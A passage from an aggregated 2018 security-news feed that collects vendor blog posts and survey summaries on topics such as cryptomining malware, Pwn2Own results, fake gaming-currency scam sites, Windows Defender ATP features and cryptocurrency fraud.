Many automation tools display pop-up messages when new software updates are available. Sometimes the updates only encompass new features, but it’s common for them to address bugs that could compromise security. When the goal is to dive into work and get as much done as possible, taking a few minutes to update automation software isn’t always an appealing option.

But, if outdated software ends up leading to an attack and compromising customer records, people will wish they didn’t procrastinate. It’s best for businesses to get on a schedule, such as checking automation software for updates on a particular day each month (Patch Tuesday, for example).

Fortunately, many software titles allow people to choose the desired time for the update to happen, or in essence, automate the maintenance of automation software. Then, users can set the software to update outside of business hours or during other likely periods of downtime.

Automation is advantageous—if security remains a priority

Although automation can be a tremendous help to businesses, it can also pose risks if misused, neglected, or too heavily relied upon. Staying aware of the security-related issues raised in this article helps organizations of all sizes and in all industries use automated tools safely and effectively.

The post 6 security concerns to consider when automating your business appeared first on Malwarebytes Labs.

This Week in Security News: Holiday Cybercriminals & Cryptomining Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn the common threats and the best practices for defending against cybercriminals during November’s online shopping season. Also, see the different cryptomining malware affecting Linux systems and learn what security tools are needed to defend against these threats.

Read on:

Cryptocurrency Mining Malware uses Various Evasion Techniques, Including Windows Installer, as Part of its Routine

The evolving aspect of cryptocurrency mining malware — constantly adding evasion techniques — means that powerful security tools are often needed to defend users from these kinds of threats. 

Researchers Earn Thousands for Exposing Mobile Device Exploits at Pwn2Own

Security researchers competing in the Pwn2Own Tokyo competition earned a collective $325,000 for demonstrating new exploits on devices made by Samsung, Xiaomi and Apple.

Cryptocurrency-mining Malware Targets Linux Systems, Uses Rootkit for Stealth

Trend Micro recently encountered a cryptocurrency-mining malware affecting Linux systems. It is notable for hiding the malicious process’ presence from monitoring tools.  

House Passes Final Version of Bill Creating Cyber Agency at DHS, Sends Measure to President

The U.S. House of Representatives gave unanimous approval to create a stand-alone cybersecurity agency at the Department of Homeland Security, and sent the bill to President Trump for his signature.

When Cybercriminals Hitch On Your Holiday Spending: Online Shopping Trends and Threats

November is expected to see the bulk of 2018 online traffic and spending. Learn the common threats and the best practices for defending against cybercriminals during this online shopping season. 

Russian Hackers Largely Skipped the Midterms, and No One Really Knows Why

After unleashing cyberattacks on the U.S. during the 2016 presidential election, Russia’s hackers mostly appeared to have sat on the sidelines during the campaign ahead of last week’s midterm elections.

Using Machine Learning to Cluster Malicious Network Flows From Gh0st RAT Variants

To address the growing number of network threats and keep abreast with the changing sophistication of network intrusion methods, Trend Micro looks into network flow clustering. 

More than 50 Nations, but not U.S., Sign onto Cybersecurity Pact

At the Paris Peace Forum, an international agreement on cybersecurity principles earned signatures from over 50 nations, 130 private sector groups and 90 charitable groups, but not the U.S., Russia or China.

Hide and Script: Inserted Malicious URLs within Office Documents’ Embedded Videos

In late October, security researchers showed from Cymulate showed a PoC exploiting a logic bug that could allow hackers to abuse the online video feature in Microsoft Office to deliver malware.

Firefox Warns if the Website You’re Visiting Suffered a Data Breach

The Firefox Monitor service warns you if your account was among the hundreds of millions affected by data breaches at sites like Yahoo, LinkedIn and Equifax.

The Importance of Employee Cybersecurity Training: Top Strategies and Best Practices

With robust employee user training that helps drive home the importance of a staffer’s role in the overall data protection and cybersecurity landscape, businesses can reduce the risk of a digital attacker.

As cryptomining malware evolves, do you think more users will be prepared to defend against these threats in 2019? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Holiday Cybercriminals & Cryptomining Malware appeared first on .

Why the EU Is More Likely to Drive IT and Security Trends Than the US

The General Data Protection Regulation (GDPR) has been a game changer for data privacy, and U.S. companies are beginning to catch up to the EU in data management practices. However, privacy is only one area in which U.S. organizations are falling behind their European counterparts. To promote compliance with data privacy regulations, both current and forthcoming, U.S. companies will have to invest a lot more in advancing security programs.

What Drives Security Trends?

The largest companies tend to drive technology and security trends. However, Europe is pushing the envelope at a greater rate than American companies.

It likely comes down to GDPR. According to Spiceworks, regulatory changes surrounding data privacy — including huge fines surrounding a data breach — have led to a greater emphasis on security enhancements like encryption. This has also likely been the catalyst for EU to adopt security technologies such as artificial intelligence (AI) and machine learning (ML).

Still, Spiceworks found that most companies on either continent turn to relatively inexpensive solutions to implement security — antivirus and security awareness training are the two most popular — as opposed to more aggressive defense strategies such as honeypots. More regulated industries are also more likely to adopt emerging security tools, which could explain why a region under the broadest data protection mandate is so far ahead.

Identify Your Program’s Weak Links

Spiceworks found that American companies tend to prefer security awareness as their primary solution for cybersecurity, as opposed to the EU, which favors technology-based tools. However, according to a study by MediaPro, 85 percent of employees who work in the financial industry, where a data breach can be particularly damaging, fail at basic security tasks such as recognizing personal data. Financial employees were also unable to tell the difference between a phishing scam and legitimate email, and the majority of employees do not alert IT or security staff when they do see a problem.

Relying on security awareness training as the primary security tool is risky. At the same time, even technological tools that improve workplace efficiency expand the organization’s digital attack surface.

Improving IT Starts With Budgeting

Spiceworks looked at the state of IT budgets, which are either staying the same or increasing across both American and European businesses. Primary spending drivers include replacing old tech and preparing for the end of Windows 7 support, which will happen in 2020, according to the survey.

Although security-specific spending is projected to increase in the coming year, according to the report, updating aging infrastructure is also a direct response to ransomware campaigns such as last year’s WannaCry attack and to promote compliance with data privacy regulations such as GDPR.

How Can Companies Budget Differently?

The size of the organization also plays a role in how it budgets. For example, while smaller companies are spending money to replace tech due to the end of its life cycle or for business growth, large enterprises are focused on improving their digital transformation with the latest technologies.

Across organizations, security software makes up about 10 percent of the IT budget. But, as the study noted, large enterprises or 5,000 employees or more are more likely to increase IT budgets due to heightened security concerns, whereas budgets at midsize organizations made up of 500 to 999 employees are more likely to grow due to corporate tax cuts.

American companies tend to be more averse to digital transformation than European ones. According to Spiceworks, one reason goes back to budgeting. To save money, organizations will wait out the life cycle of security technologies, using them until they don’t work anymore. If security leaders can adjust their existing tools to meet new requirements, thereby reducing costs, they likely will.

The cybersecurity skills shortage also comes into play. There aren’t enough skilled IT workers who can implement an automated security system, so it’s easier and cheaper to try and change behaviors of current employees and maintain old networks. This is especially true in small and midsize businesses.

Balance Security Awareness and Tech

The most effective security practices will blend security awareness with emerging security technologies.

People are prone to make errors, but decision-makers too often assume that an hourlong online seminar explaining how to spot a phishing campaign is an effective security training program. Instead, security awareness has to be built into an overall security policy and, like audits and penetration tests, conducted regularly.

Before building awareness training, decision-makers should recognize what they are securing. Is it customer data? Intellectual property? Personal devices connected to the network? Knowing what you are securing will provide a baseline of the type of awareness necessary.

The training itself should be interactive and frequent. Some companies will send out fake phishing emails to random employees to see who takes the bait. Employees who fail are required to do another round of training. Awareness training should explain why this particular information is being secured and, of course, grow with company needs.

Adding emerging security technologies is a bit trickier, because this will depend on budgets and staffing. Implementing a managed security service provider will add continuous monitoring to your network. Tools such as hardware authentication, privileged access and identity management systems, and user behavior analytics can trigger alerts of unauthorized use that even an effectively trained employee may not detect.

Companies Can’t Afford to Be Reactive

Cybersecurity has historically tended to be reactive — responding to an attack that’s already happened and working to prevent it from happening again. In a post-GDPR world, companies can’t afford to remain passive until after an incident.

As North American governments begin to address data privacy issues with their own legislation, companies will need to adapt similarly to their European counterparts. Expect to see more American organizations follow the EU’s example and adopt security technologies to better mitigate potential threats.

The post Why the EU Is More Likely to Drive IT and Security Trends Than the US appeared first on Security Intelligence.

Vaporworms: New breed of self-propagating fileless malware to emerge in 2019

WatchGuard Technologies’ information security predictions for 2019 include the emergence of vaporworms, a new breed of fileless malware with wormlike properties to self-propagate through vulnerable systems, along with a takedown of the internet itself and ransomware targeting utilities and industrial control systems. “Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said Corey Nachreiner, CTO … More

The post Vaporworms: New breed of self-propagating fileless malware to emerge in 2019 appeared first on Help Net Security.

Online shoppers continue to engage in risky behavior

Findings from a new McAfee survey reveal the risky habits of online shoppers, including using unsecured Wi-Fi for online shopping and purchasing items from online retailers they are not fully confident are genuine (51 percent). This highlights the need for consumers to slow down and consider the risks of unsafe purchasing behavior that could lead to identity theft or financial loss. Last year consumers spent $453.46 billion on the web for retail purchases, which was … More

The post Online shoppers continue to engage in risky behavior appeared first on Help Net Security.

What senior finance executives think about payments security

A WEX survey of more than 1,000 CFOs and senior financial executives from the U.S., Europe and Asia/Oceana revealed that for this group, security is paramount in payments solutions or platforms. Security – both of information and settlements – is raised by executives as a concern in multiple aspects of payments processing. In fact, according to those surveyed, security of transactions is the single most important attribute of payments. More than half of American executives—53 … More

The post What senior finance executives think about payments security appeared first on Help Net Security.

Cloud interoperability and app mobility outrank cost and security for primary hybrid cloud benefits

Enterprises plan to increase hybrid cloud usage, with 91% stating hybrid cloud as the ideal IT model, but only 18% stating they have that model today, according to Nutanix. Application mobility across any cloud is a top priority for 97% of respondents – with 88% of respondents saying it would “solve a lot of my problems.” IT decision makers ranked matching applications to the right cloud environment as a critical capability, and 35% of organizations … More

The post Cloud interoperability and app mobility outrank cost and security for primary hybrid cloud benefits appeared first on Help Net Security.

Organizations unable to achieve business resilience against cyber threats

The Resilience Gap study, which surveyed over 4,000 business decision makers across the United States, United Kingdom, France, Germany and Japan found that while 96% of the global business decision makers believe that making technology resilient to business disruptions should be core to their firm’s wider business strategy, the reality is very different. In fact, only 54% of respondents claim that it definitely is. Barriers to achieving business resilience Despite 96% of respondents claiming that … More

The post Organizations unable to achieve business resilience against cyber threats appeared first on Help Net Security.

Law firms are increasingly investing in cybersecurity programs

Logicforce released the results of its most recent Law Firm Cybersecurity Scorecard, a periodic study designed to assess cybersecurity preparedness across the legal industry and educate law firms on data protection best practices. Results of the study indicate that law firms are increasingly investing in cybersecurity programs, but most law firms are not implementing many of the protocols that will comprehensively protect them and their clients over time. Many firms’ clients and potential clients are … More

The post Law firms are increasingly investing in cybersecurity programs appeared first on Help Net Security.

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

McAfee Blogs: Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.



McAfee Blogs

What’s new in Windows Defender ATP

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today Im excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATPs unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Lets look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion and prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are new, super-fast delivery method for protection knowledge. In the event of an outbreak, Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise devices to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. Theres no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our Windows Defender ATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

Weve also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating systems built-in security features. Weve done this by putting Windows Defender ATPs antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with machines involved and the corresponding automated investigations, presenting all collected evidences and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlated malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while weve had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides technical description and data about a threat, and answer the key question, Does WDATP detect this threat?. It also provides recommended actions to contain and prevent specific threats, as well as increase organizational resilience.

But we dont stop there. We also provide an assessment of the impact of threats on your environment (Am I hit?), as well as show a view of how many machines were protected (Were you able to stop this?) and how may are exposed to the threat because they are not up-to-date or are misconfigured (Am I exposed?).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advance hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoints signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft and the insightful feedback from you, our customers, who we built these solutions for. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesnt stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.

 

 

Moti Gindi
General Manager, Windows Cyber Defense

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.

Why you need to know about Penetration Testing and Compliance Audits?

We live in an age where data flows like water, becoming the new life source of our everyday ventures. As such, you can just imagine what all of that entails and the weight that data receive, especially when it comes to a decision making on how to handle this fairly new and arguably invaluable resource. Of course, we are well aware from a very young age that our water needs to be pure, filtered

0-Days Found in iPhone X, Samsung Galaxy S9, Xiaomi Mi6 Phones

At Pwn2Own 2018 mobile hacking competition held in Tokyo on November 13-14, white hat hackers once again demonstrated that even the fully patched smartphones running the latest version of software from popular smartphone manufacturers can be hacked. Three major flagship smartphones—iPhone X, Samsung Galaxy S9, and Xiaomi Mi6—were among the devices that successfully got hacked at the annual

Online shopping fraud to surge during Black Friday and Cyber Monday

New benchmark data from ACI Worldwide revealed a projected 14 percent increase in fraud attempts during the upcoming 2018 peak holiday season. Based on hundreds of millions of merchant transactions, the data shows that fraud attempts are going to be at their highest across the Black Friday and Cyber Monday weekend. Principal findings from the data include: Fraud attempts expected to increase 14% during 2018 peak holiday season Cross Channel fraud continues to grow: In … More

The post Online shopping fraud to surge during Black Friday and Cyber Monday appeared first on Help Net Security.

Cryptocurrency fraud is the exception, not the rule

In recent months, cryptocurrencies like Bitcoin and Ethereum have begun to develop a bad name. The fact that ransomware typically demands payment in Bitcoin has helped to create negative associations for the brand.

Then there are the rapidly fluctuating exchange rates that look like deliberate attempts to manipulate the market. “Pump and dump” is a known tactic used by unscrupulous investors to temporarily increase the value of their holdings before selling them off for maximum value.

And the reality is that scammers and hackers are working the system to perpetuate fraud.

The headlines are only part of the story

Much of the problem with cryptocurrencies is that regulation still lags behind traditional currencies. National banks, like the Federal Reserve or the European Central Bank, have not yet decided how best to deal with cryptocurrency – or how to protect people using them.

This lack of consistency, and the perceived privacy offered by cryptocurrencies is the reason that criminals are so attracted to the system. So much so that cryptocurrency scams are now the second most common investment scam in Australia for instance.

Crime sells newspapers, so it is little surprise that the media is quick to publicise instances of fraud. But in the same way that most online transactions made using traditional currencies are perfectly legitimate, so too are cryptocurrency transactions. Fraud remains a small part of the bigger cryptocurrency picture, even if the media headlines suggest otherwise.

Digging into the statistics proves this to be the case. Take the Australian example. In 2017, there was a total of 200,000 scam reports submitted to the Australian Competition and Consumer Commission – the government body that enforces consumer protection law. The accumulated losses from these scams was AUD $340 million – a fairly large number for a country of 25 million people.

But when you drill down into those figures, just AUD $2.1 million of those losses were attributed to cryptocurrency fraud. Less than 1% of all reported fraud in Australia was cryptocurrency related.

On a worldwide scale however, Bitcoin estimate that $3.25 billion will be lost to fraud.

A serious problem for the unprepared

Like any other currency, cryptocurrencies can be risky for the unprepared. Before jumping on the Bitcoin bandwagon, you must understand what it is for, how it is used, and the common scams you need to avoid.

At the front end, always be suspicious of “get rich quick” schemes. These systems can be very profitable – for the scammer running them. You should always check anything that sounds too good to be true. Similarly, check that websites maintain the same level of security as any other online store before making a cryptocurrency payment.

One other thing to bear in mind – virtual wallets. Virtual wallets are used to securely store your cryptocurrency on your computer. If the wallet is compromised or stolen, your cryptocurrency goes with it.

Hackers will try and steal digital wallets, so it is vital that your computer is properly secured. You must install robust anti-malware, like Panda Dome, on your computer to identify and block unauthorised attempts to access your wallet and its contents.

Bitcoin is one of the biggest scams in centuries, like the one the world has never seen and we are only at the beginning of this history. Bitcoin scams have been famously criminal and public in nature. The bottom line is scammers also want to profit somehow from Bitcoin, but through nefarious means. This typically involves targeting unprepared victims, who end up losing their Bitcoin as a result, we need to know and make sure we don’t become the next victim“, explains Herve Lambert, Global Consumer Operations Manager at Panda Security.

For most people, cryptocurrency is not yet an issue. But when you do decide to start using one, make sure that you are properly protected and you can avoid becoming one of the minority of people who become victims of scams.

Download your Antivirus

The post Cryptocurrency fraud is the exception, not the rule appeared first on Panda Security Mediacenter.

IoT related security missteps cost enterprises millions

Enterprises have begun sustaining significant monetary losses stemming from the lack of good practices as they move forward with incorporating the IoT into their business models, according to a new study from DigiCert. Among companies surveyed that are struggling the most with IoT security, 25 percent reported IoT security-related losses of at least $34 million in the last two years. These findings come amid a ramping up of IoT focus within the typical organization. Eighty-three … More

The post IoT related security missteps cost enterprises millions appeared first on Help Net Security.

Container strategies don’t take security seriously enough

Most organizations do not feel prepared to adequately secure cloud-native applications, despite the surging adoption of containers and Kubernetes, according to StackRox. Notable findings: More than a third of organizations with concerns about their container strategy worry that their strategies don’t adequately address container security An additional 15 percent believe their strategies don’t take seriously enough the threat to containers and Kubernetes deployments More than one-third of respondents haven’t started or are just creating their … More

The post Container strategies don’t take security seriously enough appeared first on Help Net Security.